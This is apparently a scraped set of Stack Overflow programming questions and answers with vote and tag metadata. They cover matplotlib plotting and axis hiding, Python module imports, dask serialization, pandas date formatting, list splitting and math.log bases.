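    return found if found else np.nan

course_name_skills["hard skills"] = course_name_skills["skills"].apply(find_hard_skills)
only_hardskills = course_name_skills.dropna(subset=["hard skills"])
print(only_hardskills)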
Q: How to Plot Implicit Equation in Python I want to Plot V(y axis) vs t(x axis) graph using the below equation at 5 different values of L(shown below) L= [5,10,15,20,25] b=0.0032 Equation, (b*V*0.277*t) - (b*L) = log(1+b*V*0.277*t) code output will be as shown in figure Expected Outcome A: While sympy exposes the plot_implicit function, the results are far from good. We can use Numpy and Matplotlib to achieve our goal. The basic idea is that your equation can be written as LHS - RHS = 0. So, we can create contour plots and select the level 0. But contour plots uses colormaps, so we will have to create solid colormaps: import matplotlib.pyplot as plt import matplotlib.cm as cm from matplotlib.lines import Line2D from matplotlib.colors import ListedColormap import numpy as np Lvalues = [5,10,15,20,25] bval = 0.0032 V = np.linspace(0, 1000) t = np.linspace(0, 10) V, t = np.meshgrid(V, t) f = lambda V, t, b, L: b*V*0.277*t - b*L - np.log(1+b*V*0.277*t) colors = cm.tab10.colors handles = [] fig, ax = plt.subplots() for L, c in zip(Lvalues, colors): cmap = ListedColormap([c, c]) z = f(V, t, bval, L) ax.contour(t, V, z, levels=[0], cmap=cmap) handles.append(Line2D([], [], color=c, label="L = %s" % L)) ax.legend(handles=handles) plt.show()
How to Plot Implicit Equation in Python
I want to Plot V(y axis) vs t(x axis) graph using the below equation at 5 different values of L(shown below) L= [5,10,15,20,25] b=0.0032 Equation, (b*V*0.277*t) - (b*L) = log(1+b*V*0.277*t) code output will be as shown in figure Expected Outcome
[ "While sympy exposes the plot_implicit function, the results are far from good. We can use Numpy and Matplotlib to achieve our goal.\nThe basic idea is that your equation can be written as LHS - RHS = 0. So, we can create contour plots and select the level 0. But contour plots uses colormaps, so we will have to create solid colormaps:\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib.lines import Line2D\nfrom matplotlib.colors import ListedColormap\nimport numpy as np\n\nLvalues = [5,10,15,20,25]\nbval = 0.0032\n\nV = np.linspace(0, 1000)\nt = np.linspace(0, 10)\nV, t = np.meshgrid(V, t)\nf = lambda V, t, b, L: b*V*0.277*t - b*L - np.log(1+b*V*0.277*t)\n\ncolors = cm.tab10.colors\nhandles = []\nfig, ax = plt.subplots()\nfor L, c in zip(Lvalues, colors):\n cmap = ListedColormap([c, c])\n z = f(V, t, bval, L)\n ax.contour(t, V, z, levels=[0], cmap=cmap)\n handles.append(Line2D([], [], color=c, label=\"L = %s\" % L))\nax.legend(handles=handles)\nplt.show()\n\n\n" ]
[ 2 ]
[]
[]
[ "equation", "implicit", "matplotlib", "python", "sympy" ]
stackoverflow_0074575607_equation_implicit_matplotlib_python_sympy.txt
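For reference, the sympy route mentioned at the start of the answer would look roughly like this, producing one figure per value of L; sympy's log is the natural logarithm, matching np.log above, and, as the answer warns, the rendering quality of plot_implicit can be poor.

from sympy import symbols, Eq, log, plot_implicit

V, t = symbols("V t", positive=True)
b = 0.0032

for L in [5, 10, 15, 20, 25]:
    eq = Eq(b*V*0.277*t - b*L, log(1 + b*V*0.277*t))
    plot_implicit(eq, (t, 0, 10), (V, 0, 1000), title=f"L = {L}")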
Q: Acessing for loop varible in another python script I have the file name as file1.py the code is following. ` import os global x def a_function(): while True: for x in range(12): cmd=f'rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5 ' os.system(cmd) a_function() I want to acess x in another python scriptfile2.py` the code is following from file1 import x print(x) but the problem is file1.py executed when i run file2.py. I want only x to be printed in file2.py Can not acessing global variable in another python script. A: In order to correct this, add an if statement to check if the file1.py itself is being run. If it is, then __name__ should equal '__main__'. The code that you want to be read by file2.py should be outside the if statement and all code that you want to execute only if file1.py is run should be inside the if statement. For example: import os global x if __name__ == '__main__': def a_function(): while True: for x in range(12): cmd=f'rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5 ' os.system(cmd) a_function()
Accessing for loop variable in another python script
Accessing for loop variable in another python script
I have the file name as file1.py the code is following. ` import os global x def a_function(): while True: for x in range(12): cmd=f'rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5 ' os.system(cmd) a_function() I want to acess x in another python scriptfile2.py` the code is following from file1 import x print(x) but the problem is file1.py executed when i run file2.py. I want only x to be printed in file2.py Can not acessing global variable in another python script.
[ "In order to correct this, add an if statement to check if the file1.py itself is being run. If it is, then __name__ should equal '__main__'.\nThe code that you want to be read by file2.py should be outside the if statement and all code that you want to execute only if file1.py is run should be inside the if statement. For example:\nimport os\n\nglobal x\n\nif __name__ == '__main__':\n def a_function():\n while True:\n for x in range(12):\n\n cmd=f'rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5 '\n os.system(cmd)\n\n a_function()\n\n" ]
[ 0 ]
[]
[]
[ "global", "loops", "module", "python", "scope" ]
stackoverflow_0074575586_global_loops_module_python_scope.txt
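A variant of the answer's idea that avoids importing a mutable global at all: put the work in a function that returns the value, guard the endless loop behind __name__ == '__main__', and call the function from file2.py. The file names, the rosbag command and the value x come from the question; record_bags and its n parameter are invented for the sketch.

# file1.py
import os

def record_bags(n=12):
    last_x = None
    for x in range(n):
        cmd = f"rosbag record -O /home/mubashir/catkin_ws/src/germany1_trush/rosbag/{x}.bag /web_cam --duration 5"
        os.system(cmd)
        last_x = x
    return last_x

if __name__ == "__main__":
    while True:
        record_bags()

# file2.py
from file1 import record_bags

x = record_bags(n=1)   # records once and returns the loop value, without looping forever
print(x)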
Q: Hiding axis text in matplotlib plots I'm trying to plot a figure without tickmarks or numbers on either of the axes (I use axes in the traditional sense, not the matplotlib nomenclature!). An issue I have come across is where matplotlib adjusts the x(y)ticklabels by subtracting a value N, then adds N at the end of the axis. This may be vague, but the following simplified example highlights the issue, with '6.18' being the offending value of N: import matplotlib.pyplot as plt import random prefix = 6.18 rx = [prefix+(0.001*random.random()) for i in arange(100)] ry = [prefix+(0.001*random.random()) for i in arange(100)] plt.plot(rx,ry,'ko') frame1 = plt.gca() for xlabel_i in frame1.axes.get_xticklabels(): xlabel_i.set_visible(False) xlabel_i.set_fontsize(0.0) for xlabel_i in frame1.axes.get_yticklabels(): xlabel_i.set_fontsize(0.0) xlabel_i.set_visible(False) for tick in frame1.axes.get_xticklines(): tick.set_visible(False) for tick in frame1.axes.get_yticklines(): tick.set_visible(False) plt.show() The three things I would like to know are: How to turn off this behaviour in the first place (although in most cases it is useful, it is not always!) I have looked through matplotlib.axis.XAxis and cannot find anything appropriate How can I make N disappear (i.e. X.set_visible(False)) Is there a better way to do the above anyway? My final plot would be 4x4 subplots in a figure, if that is relevant. A: Instead of hiding each element, you can hide the whole axis: frame1.axes.get_xaxis().set_visible(False) frame1.axes.get_yaxis().set_visible(False) Or, you can set the ticks to an empty list: frame1.axes.get_xaxis().set_ticks([]) frame1.axes.get_yaxis().set_ticks([]) In this second option, you can still use plt.xlabel() and plt.ylabel() to add labels to the axes. A: If you want to hide just the axis text keeping the grid lines: frame1 = plt.gca() frame1.axes.xaxis.set_ticklabels([]) frame1.axes.yaxis.set_ticklabels([]) Doing set_visible(False) or set_ticks([]) will also hide the grid lines. A: If you are like me and don't always retrieve the axes, ax, when plotting the figure, then a simple solution would be to do plt.xticks([]) plt.yticks([]) A: I've colour coded this figure to ease the process. import matplotlib.pyplot as plt fig = plt.figure() ax = fig.add_subplot(111) You can have full control over the figure using these commands, to complete the answer I've add also the control over the splines: ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) # X AXIS -BORDER ax.spines['bottom'].set_visible(False) # BLUE ax.set_xticklabels([]) # RED ax.set_xticks([]) # RED AND BLUE TOGETHER ax.axes.get_xaxis().set_visible(False) # Y AXIS -BORDER ax.spines['left'].set_visible(False) # YELLOW ax.set_yticklabels([]) # GREEN ax.set_yticks([]) # YELLOW AND GREEN TOGHETHER ax.axes.get_yaxis().set_visible(False) A: I was not actually able to render an image without borders or axis data based on any of the code snippets here (even the one accepted at the answer). After digging through some API documentation, I landed on this code to render my image plt.axis('off') plt.tick_params(axis='both', left=False, top=False, right=False, bottom=False, labelleft=False, labeltop=False, labelright=False, labelbottom=False) plt.savefig('foo.png', dpi=100, bbox_inches='tight', pad_inches=0.0) I used the tick_params call to basically shut down any extra information that might be rendered and I have a perfect graph in my output file. 
A: Somewhat of an old thread but, this seems to be a faster method using the latest version of matplotlib: set the major formatter for the x-axis ax.xaxis.set_major_formatter(plt.NullFormatter()) A: One trick could be setting the color of tick labels as white to hide it! plt.xticks(color='w') plt.yticks(color='w') or to be more generalized (@Armin Okić), you can set it as "None". A: When using the object oriented API, the Axes object has two useful methods for removing the axis text, set_xticklabels() and set_xticks(). Say you create a plot using fig, ax = plt.subplots(1) ax.plot(x, y) If you simply want to remove the tick labels, you could use ax.set_xticklabels([]) or to remove the ticks completely, you could use ax.set_xticks([]) These methods are useful for specifying exactly where you want the ticks and how you want them labeled. Passing an empty list results in no ticks, or no labels, respectively. A: You could simply set xlabel to None, straight in your axis. Below an working example using seaborn from matplotlib import pyplot as plt import seaborn as sns tips = sns.load_dataset("tips") ax = sns.boxplot(x="day", y="total_bill", data=tips) ax.set(xlabel=None) plt.show() A: Just do this in case you have subplots fig, axs = plt.subplots(1, 2, figsize=(16, 8)) ax[0].set_yticklabels([]) # x-axis ax[0].set_xticklabels([]) # y-axis
Hiding axis text in matplotlib plots
I'm trying to plot a figure without tickmarks or numbers on either of the axes (I use axes in the traditional sense, not the matplotlib nomenclature!). An issue I have come across is where matplotlib adjusts the x(y)ticklabels by subtracting a value N, then adds N at the end of the axis. This may be vague, but the following simplified example highlights the issue, with '6.18' being the offending value of N: import matplotlib.pyplot as plt import random prefix = 6.18 rx = [prefix+(0.001*random.random()) for i in arange(100)] ry = [prefix+(0.001*random.random()) for i in arange(100)] plt.plot(rx,ry,'ko') frame1 = plt.gca() for xlabel_i in frame1.axes.get_xticklabels(): xlabel_i.set_visible(False) xlabel_i.set_fontsize(0.0) for xlabel_i in frame1.axes.get_yticklabels(): xlabel_i.set_fontsize(0.0) xlabel_i.set_visible(False) for tick in frame1.axes.get_xticklines(): tick.set_visible(False) for tick in frame1.axes.get_yticklines(): tick.set_visible(False) plt.show() The three things I would like to know are: How to turn off this behaviour in the first place (although in most cases it is useful, it is not always!) I have looked through matplotlib.axis.XAxis and cannot find anything appropriate How can I make N disappear (i.e. X.set_visible(False)) Is there a better way to do the above anyway? My final plot would be 4x4 subplots in a figure, if that is relevant.
[ "Instead of hiding each element, you can hide the whole axis:\nframe1.axes.get_xaxis().set_visible(False)\nframe1.axes.get_yaxis().set_visible(False)\n\nOr, you can set the ticks to an empty list:\nframe1.axes.get_xaxis().set_ticks([])\nframe1.axes.get_yaxis().set_ticks([])\n\nIn this second option, you can still use plt.xlabel() and plt.ylabel() to add labels to the axes.\n", "If you want to hide just the axis text keeping the grid lines:\nframe1 = plt.gca()\nframe1.axes.xaxis.set_ticklabels([])\nframe1.axes.yaxis.set_ticklabels([])\n\nDoing set_visible(False) or set_ticks([]) will also hide the grid lines.\n", "If you are like me and don't always retrieve the axes, ax, when plotting the figure, then a simple solution would be to do \nplt.xticks([])\nplt.yticks([])\n\n", "I've colour coded this figure to ease the process.\nimport matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\n\n\nYou can have full control over the figure using these commands, to complete the answer I've add also the control over the splines:\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\n\n# X AXIS -BORDER\nax.spines['bottom'].set_visible(False)\n# BLUE\nax.set_xticklabels([])\n# RED\nax.set_xticks([])\n# RED AND BLUE TOGETHER\nax.axes.get_xaxis().set_visible(False)\n\n# Y AXIS -BORDER\nax.spines['left'].set_visible(False)\n# YELLOW\nax.set_yticklabels([])\n# GREEN\nax.set_yticks([])\n# YELLOW AND GREEN TOGHETHER\nax.axes.get_yaxis().set_visible(False)\n\n", "I was not actually able to render an image without borders or axis data based on any of the code snippets here (even the one accepted at the answer). After digging through some API documentation, I landed on this code to render my image\nplt.axis('off')\nplt.tick_params(axis='both', left=False, top=False, right=False, bottom=False, labelleft=False, labeltop=False, labelright=False, labelbottom=False)\nplt.savefig('foo.png', dpi=100, bbox_inches='tight', pad_inches=0.0)\n\nI used the tick_params call to basically shut down any extra information that might be rendered and I have a perfect graph in my output file.\n", "Somewhat of an old thread but, this seems to be a faster method using the latest version of matplotlib:\nset the major formatter for the x-axis\nax.xaxis.set_major_formatter(plt.NullFormatter())\n\n", "One trick could be setting the color of tick labels as white to hide it!\nplt.xticks(color='w')\nplt.yticks(color='w')\n\nor to be more generalized (@Armin Okić), you can set it as \"None\".\n", "When using the object oriented API, the Axes object has two useful methods for removing the axis text, set_xticklabels() and set_xticks().\nSay you create a plot using \nfig, ax = plt.subplots(1)\nax.plot(x, y)\n\nIf you simply want to remove the tick labels, you could use\nax.set_xticklabels([])\n\nor to remove the ticks completely, you could use\nax.set_xticks([])\n\nThese methods are useful for specifying exactly where you want the ticks and how you want them labeled. Passing an empty list results in no ticks, or no labels, respectively.\n", "You could simply set xlabel to None, straight in your axis. Below an working example using seaborn\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\n\ntips = sns.load_dataset(\"tips\")\n\nax = sns.boxplot(x=\"day\", y=\"total_bill\", data=tips)\nax.set(xlabel=None)\n\nplt.show()\n\n", "Just do this in case you have subplots\nfig, axs = plt.subplots(1, 2, figsize=(16, 8))\n\nax[0].set_yticklabels([]) # x-axis\nax[0].set_xticklabels([]) # y-axis\n\n" ]
[ 625, 283, 211, 121, 85, 66, 18, 15, 3, 0 ]
[]
[]
[ "matplotlib", "plot", "python" ]
stackoverflow_0002176424_matplotlib_plot_python.txt
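On current matplotlib the two behaviours in the question can also be handled with a couple of calls, sketched below against made-up data in the same 6.18 range; ticklabel_format(useOffset=False) addresses the offset text the question complains about, and set_axis_off() is the blunt option that removes everything.

import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.plot([6.1801, 6.1805, 6.1803], "ko")

# stop matplotlib from factoring out the common "+6.18" offset
ax.ticklabel_format(useOffset=False)

# hide tick marks and tick labels but keep the frame
ax.tick_params(bottom=False, left=False, labelbottom=False, labelleft=False)

# or drop spines, ticks and labels all at once
# ax.set_axis_off()

plt.show()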
Q: How do I create and access variables algorithmically? I'm trying to assign and reference variables algorithmically. See below: varName = "a0" value = 1 globals()[varName] = value print(varName) print(a0) This returns: a0 1 So, the variable varName is "a0", which is right. And the variable a0 is 1, which is also right. But I want varName to output 1 directly instead of "a0". How do I connect them as such?
How do I create and access variables algorithmically?
I'm trying to assign and reference variables algorithmically. See below: varName = "a0" value = 1 globals()[varName] = value print(varName) print(a0) This returns: a0 1 So, the variable varName is "a0", which is right. And the variable a0 is 1, which is also right. But I want varName to output 1 directly instead of "a0". How do I connect them as such?
[]
[]
[ "To get the value of varName you can use eval function.\nvarName = \"a0\"\nvalue = 1\n\nglobals()[varName] = value\n\n# eval function here\nprint(eval(varName))\nprint(a0)\n\nOutput:\n1\n1\n\n" ]
[ -1 ]
[ "python" ]
stackoverflow_0074576226_python.txt
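The usual alternative to creating variable names at run time is to keep the values in a dict keyed by the would-be name; a minimal sketch with the same a0/1 pair from the question:

values = {}

var_name = "a0"
values[var_name] = 1

print(var_name)          # a0
print(values[var_name])  # 1
print(values["a0"])      # 1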
Q: dask.distributed: handle serialization of exotic objects? Context I am trying to write a data pipeline using dask distributed and some legacy code from a previous project. get_data simply get url:str and session:ClientSession as arguments and return a pandas DataFrame. from dask.distributed import Client from aiohttp import ClientSession client = Client() session: ClientSession = connector.session_factory() futures = client.map( get_data, # function to get data (takes url and http session) urls, [session for _ in range(len(urls))], # PROBLEM IS HERE retries=5, ) r = client.map(loader.job, futures) _ = client.gather(r) Problem I get the following error File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/distributed/worker.py", line 2952, in warn_dumps b = dumps(obj) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/distributed/protocol/pickle.py", line 58, in dumps result = cloudpickle.dumps(x, **dump_kwargs) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/cloudpickle/cloudpickle_fast.py", line 73, in dumps cp.dump(obj) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/cloudpickle/cloudpickle_fast.py", line 632, in dump return Pickler.dump(self, obj) TypeError: cannot pickle 'TaskStepMethWrapper' object Unclosed client session client_session: <aiohttp.client.ClientSession object at 0x7f3042b2fa00> My temptation was then to register a serializer and a deserializer for this exotic object following this doc from distributed.protocol import dask_serialize, dask_deserialize @dask_serialize.register(TaskStepMethWrapper) def serialize(ctx: TaskStepMethWrapper) -> Tuple[Dict, List[bytes]]: header = {} #? frames = [] #? return header, frames @dask_deserialize.register(TaskStepMethWrapper) def deserialize(header: Dict, frames: List[bytes]) -> TaskStepMethWrapper: return TaskStepMethWrapper(frames) #? The problem is that I don't know where to load TaskStepMethWrapper from. I know that class TaskStepMethWrapper is asyncio related grep -rnw './' -e '.*TaskStepMethWrapper.*' grep: ./lib-dynload/_asyncio.cpython-310-x86_64-linux-gnu.so : fichiers binaires correspondent But I couldn't find its definition anywhere in site-packages/aiohttp. I also tried to use a Client(asynchronous=True) with only resulted in a TypeError: cannot pickle '_contextvars.Context' object. How do you handle exotic objects serializations in dask. Should I extend the dask serializer or use an additional serialization family? client = Client('tcp://scheduler-address:8786', serializers=['dask', 'pickle'], # BUT WHICH ONE deserializers=['dask', 'msgpack']) # BUT WHICH ONE A: There is a far easier to get around this: create your sessions within the mapped function. You would have been recreating the sessions in each worker anyway, they cannot survive a transfer from dask.distributed import Client from aiohttp import ClientSession client = Client() def func(u): session: ClientSession = connector.session_factory() return get_data(u, session) futures = client.map( func, urls, retries=5, ) (I don't know what loader.job is, so I have omitted that). Note that TaskStepMethWrapper (and anything to do with aiohttp) sounds like it should be called only in async code. Maybe func needs to be async and you need appropriate awaits.
dask.distributed: handle serialization of exotic objects?
Context I am trying to write a data pipeline using dask distributed and some legacy code from a previous project. get_data simply get url:str and session:ClientSession as arguments and return a pandas DataFrame. from dask.distributed import Client from aiohttp import ClientSession client = Client() session: ClientSession = connector.session_factory() futures = client.map( get_data, # function to get data (takes url and http session) urls, [session for _ in range(len(urls))], # PROBLEM IS HERE retries=5, ) r = client.map(loader.job, futures) _ = client.gather(r) Problem I get the following error File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/distributed/worker.py", line 2952, in warn_dumps b = dumps(obj) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/distributed/protocol/pickle.py", line 58, in dumps result = cloudpickle.dumps(x, **dump_kwargs) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/cloudpickle/cloudpickle_fast.py", line 73, in dumps cp.dump(obj) File "/home/zar3bski/.cache/pypoetry/virtualenvs/poc-dask-iG-N0GH5-py3.10/lib/python3.10/site-packages/cloudpickle/cloudpickle_fast.py", line 632, in dump return Pickler.dump(self, obj) TypeError: cannot pickle 'TaskStepMethWrapper' object Unclosed client session client_session: <aiohttp.client.ClientSession object at 0x7f3042b2fa00> My temptation was then to register a serializer and a deserializer for this exotic object following this doc from distributed.protocol import dask_serialize, dask_deserialize @dask_serialize.register(TaskStepMethWrapper) def serialize(ctx: TaskStepMethWrapper) -> Tuple[Dict, List[bytes]]: header = {} #? frames = [] #? return header, frames @dask_deserialize.register(TaskStepMethWrapper) def deserialize(header: Dict, frames: List[bytes]) -> TaskStepMethWrapper: return TaskStepMethWrapper(frames) #? The problem is that I don't know where to load TaskStepMethWrapper from. I know that class TaskStepMethWrapper is asyncio related grep -rnw './' -e '.*TaskStepMethWrapper.*' grep: ./lib-dynload/_asyncio.cpython-310-x86_64-linux-gnu.so : fichiers binaires correspondent But I couldn't find its definition anywhere in site-packages/aiohttp. I also tried to use a Client(asynchronous=True) with only resulted in a TypeError: cannot pickle '_contextvars.Context' object. How do you handle exotic objects serializations in dask. Should I extend the dask serializer or use an additional serialization family? client = Client('tcp://scheduler-address:8786', serializers=['dask', 'pickle'], # BUT WHICH ONE deserializers=['dask', 'msgpack']) # BUT WHICH ONE
[ "There is a far easier to get around this: create your sessions within the mapped function. You would have been recreating the sessions in each worker anyway, they cannot survive a transfer\nfrom dask.distributed import Client\nfrom aiohttp import ClientSession\nclient = Client()\n\ndef func(u):\n session: ClientSession = connector.session_factory()\n return get_data(u, session)\n\nfutures = client.map(\n func,\n urls,\n retries=5,\n)\n\n(I don't know what loader.job is, so I have omitted that).\nNote that TaskStepMethWrapper (and anything to do with aiohttp) sounds like it should be called only in async code. Maybe func needs to be async and you need appropriate awaits.\n" ]
[ 1 ]
[]
[]
[ "dask", "dask_distributed", "python", "serialization" ]
stackoverflow_0074573626_dask_dask_distributed_python_serialization.txt
Q: How to normalise a date columnin pandas dataframe to the same format I have a dataframe made from pulling in different excel sheets. I am trying to normalise the date_time column to just a standard DD/MM/YYY format. Is that possible? 1 DATE Column 3 Column 4 Column 5 Column 6 2 01/03/2021 00:00 3 01/03/2021 00:00 4 01/03/2021 00:00 5 01/03/2021 00:00 6 01/03/2021 00:00 ... ... 122350 11/24/2022 122351 11/24/2022 122352 11/24/2022 122353 11/24/2022 122354 11/24/2022 A: # example df df = pd.DataFrame({'DATE': ['01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '11/24/2022', '11/24/2022', '11/24/2022', '11/24/2022', '11/24/2022']}) df['DATE'] = pd.to_datetime(df['DATE']) df['DATE'] = df['DATE'].dt.strftime('%d/%m/%Y') output: > df DATE 0 03/01/2021 1 03/01/2021 2 03/01/2021 3 03/01/2021 4 03/01/2021 5 24/11/2022 6 24/11/2022 7 24/11/2022 8 24/11/2022 9 24/11/2022
How to normalise a date column in a pandas dataframe to the same format
I have a dataframe made from pulling in different excel sheets. I am trying to normalise the date_time column to just a standard DD/MM/YYY format. Is that possible? 1 DATE Column 3 Column 4 Column 5 Column 6 2 01/03/2021 00:00 3 01/03/2021 00:00 4 01/03/2021 00:00 5 01/03/2021 00:00 6 01/03/2021 00:00 ... ... 122350 11/24/2022 122351 11/24/2022 122352 11/24/2022 122353 11/24/2022 122354 11/24/2022
[ "# example df\ndf = pd.DataFrame({'DATE': ['01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '01/03/2021 00:00', '11/24/2022', '11/24/2022', '11/24/2022', '11/24/2022', '11/24/2022']})\ndf['DATE'] = pd.to_datetime(df['DATE'])\ndf['DATE'] = df['DATE'].dt.strftime('%d/%m/%Y')\n\noutput:\n> df\n\n DATE\n0 03/01/2021\n1 03/01/2021\n2 03/01/2021\n3 03/01/2021\n4 03/01/2021\n5 24/11/2022\n6 24/11/2022\n7 24/11/2022\n8 24/11/2022\n9 24/11/2022\n\n" ]
[ 1 ]
[]
[]
[ "excel", "pandas", "python" ]
stackoverflow_0074576304_excel_pandas_python.txt
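One hedged caveat on the answer above: the sample mixes 01/03/2021 00:00 with 11/24/2022, and pd.to_datetime guesses month-first by default, so the ambiguous value becomes 3 January. If the source sheets are actually day-first, something like the following (pandas 2.0 or newer for format="mixed") is closer; whether dayfirst is right depends on where each sheet came from.

import pandas as pd

s = pd.Series(["01/03/2021 00:00", "11/24/2022"])

# parse each value on its own, preferring day-first where the date is ambiguous
parsed = pd.to_datetime(s, format="mixed", dayfirst=True)
print(parsed.dt.strftime("%d/%m/%Y"))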
Q: Splitting arrays in Python I have the following problem: I would like to find different "cuts" of the array into two different arrays by adding one element each time, for example: If I have an array a = [0,1,2,3] The following splits are desired: [0] [1,2,3] [0,1] [2,3] [0,1,2] [3] In the past I had easier tasks so np.split() function was quite enough for me. How should I act in this particular case? Many thanks in advance and apologies if this question was asked before. A: Use slicing, more details : Understanding slicing. a = [0,1,2,3] for i in range(len(a)-1): print(a[:i+1], a[i+1:]) Output: [0] [1, 2, 3] [0, 1] [2, 3] [0, 1, 2] [3] A: Check this out: a = [0,1,2,3] result = [(a[:x], a[x:]) for x in range(1, len(a))] print(result) # [([0], [1, 2, 3]), ([0, 1], [2, 3]), ([0, 1, 2], [3])] # you can access result like normal list print(result[0]) # ([0], [1, 2, 3])
Splitting arrays in Python
I have the following problem: I would like to find different "cuts" of the array into two different arrays by adding one element each time, for example: If I have an array a = [0,1,2,3] The following splits are desired: [0] [1,2,3] [0,1] [2,3] [0,1,2] [3] In the past I had easier tasks so np.split() function was quite enough for me. How should I act in this particular case? Many thanks in advance and apologies if this question was asked before.
[ "Use slicing, more details : Understanding slicing.\na = [0,1,2,3]\n\nfor i in range(len(a)-1):\n print(a[:i+1], a[i+1:])\n\nOutput:\n[0] [1, 2, 3]\n[0, 1] [2, 3]\n[0, 1, 2] [3]\n\n", "Check this out:\na = [0,1,2,3]\n\nresult = [(a[:x], a[x:]) for x in range(1, len(a))]\n\nprint(result)\n# [([0], [1, 2, 3]), ([0, 1], [2, 3]), ([0, 1, 2], [3])]\n\n# you can access result like normal list\nprint(result[0])\n# ([0], [1, 2, 3])\n\n" ]
[ 2, 1 ]
[]
[]
[ "arrays", "python" ]
stackoverflow_0074576364_arrays_python.txt
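Since the question mentions np.split, the same prefix/suffix cuts for a NumPy array look like this; the split point runs over every index from 1 to len(a)-1.

import numpy as np

a = np.array([0, 1, 2, 3])

for i in range(1, len(a)):
    left, right = np.split(a, [i])
    print(left, right)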
Q: the log in math library does not work for me i have been trying to get log to work but it just doesnt get the same value as you would get with a calculator. i tried these but none work; i want to calculate for example 600 log 600 but never has that actual value. the only difference between the below codes is they calulate worst_mergesort defferently: rows * math.log(rows) math.log(rows) math.log(rows, rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = math.log(rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = math.log(rows, rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = rows * math.log(rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) A: I think the problem is simply that the base of the logarithm is different in math.log than in a calculator. math.log computes the natural logarithm, so the base is e and the calculators usually use base 10 by default. In math.log, you can specify the base as a second argument e.g. 
600*math.log(600, 10) should give you the expected answer.
the log in math library does not work for me
i have been trying to get log to work but it just doesnt get the same value as you would get with a calculator. i tried these but none work; i want to calculate for example 600 log 600 but never has that actual value. the only difference between the below codes is they calulate worst_mergesort defferently: rows * math.log(rows) math.log(rows) math.log(rows, rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = math.log(rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = math.log(rows, rows) print(worst_mergesort) print(rows) 